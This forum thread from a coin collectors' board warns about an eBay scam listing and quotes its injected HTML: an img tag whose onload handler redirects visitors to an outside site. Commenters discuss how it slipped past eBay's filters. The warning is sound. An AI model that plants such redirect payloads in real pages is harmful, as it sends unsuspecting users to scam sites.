Home World & Ancient Coins Forum

Scamming Ebay Ratb*stards from Hell!

These slimeballs are good.... really good.

Headed to the CD category on Ebay. The first listing below looked bizarre (image blurred for decency purposes).

image


Being curious, I clicked on the auction link and ended up at the page below:

image


Now, this took me aback for a second, and then I saw the URL in the address bar.

The b*stards have programmed a redirect into their auction text.

I was able to do a "Save Link As..." and save the source code for the listing page. It's actually plain HTML, part of an IMG tag:

<img src=http://pics.ebaystatic.com/aw/pics/s.gif onload=location="http://holaamigo.50megs.com/main.html">

Hopefully Ebay will implement some parsing to eliminate this loophole.

Be careful out there folks...

[And yes, I reported it to Ebay immediately]

Comments

  • AethelredAethelred Posts: 9,288 ✭✭✭
    image
    If you are in the Western North Carolina area, please consider visiting our coin shop:

    WNC Coins, LLC
    1987-C Hendersonville Road
    Asheville, NC 28803


    wnccoins.com
  • worldcoinguyworldcoinguy Posts: 2,999 ✭✭✭✭
    Thanks for the heads up. I would think this would be priority #1 for eBay technical folks before it undermines the credibility of the site. Scary.
  • spoonspoon Posts: 2,798 ✭✭✭
    How the $@#!! can they push an onload command into the ebay main listing?? Now I've never sold there, but isn't the image used in thumbnails taken from a form field? or at least ripping the SRC from an IMG line? How would another param get in there? They don't take the height/width params.. why an onload?

    /rant image
  • you don't have to use ebay services for pictures - you can program your own html into the listing to get to your picture (or what ever it is that you want to point the html to)

    Cecil
    Total Copper Nutcase - African, British Ships, Channel Islands!!!
    'Do not meddle in the affairs of dragons, for you are crunchy and taste good with ketchup'
  • coinpicturescoinpictures Posts: 5,345 ✭✭✭


    << <i>you don't have to use ebay services for pictures - you can program your own html into the listing to get to your picture (or what ever it is that you want to point the html to) >>



    Yup. I do all my own image hosting rather than using Ebay's services. Since I have my own server space, I can put as many and as large images as I want in my auctions.

    I do NOT think the answer is for Ebay to force people to use their image hosting (at a fee), but it wouldn't surprise me if they try that.

    All they really need to do is tweak their parsing algorithms. They already filter out JavaScript. Now they just need to look for the various permutations of the "location=" parameter.

    Of course Ebay has already proven on countless occasions that they will implement changes the wrong way...
Sign In or Register to comment.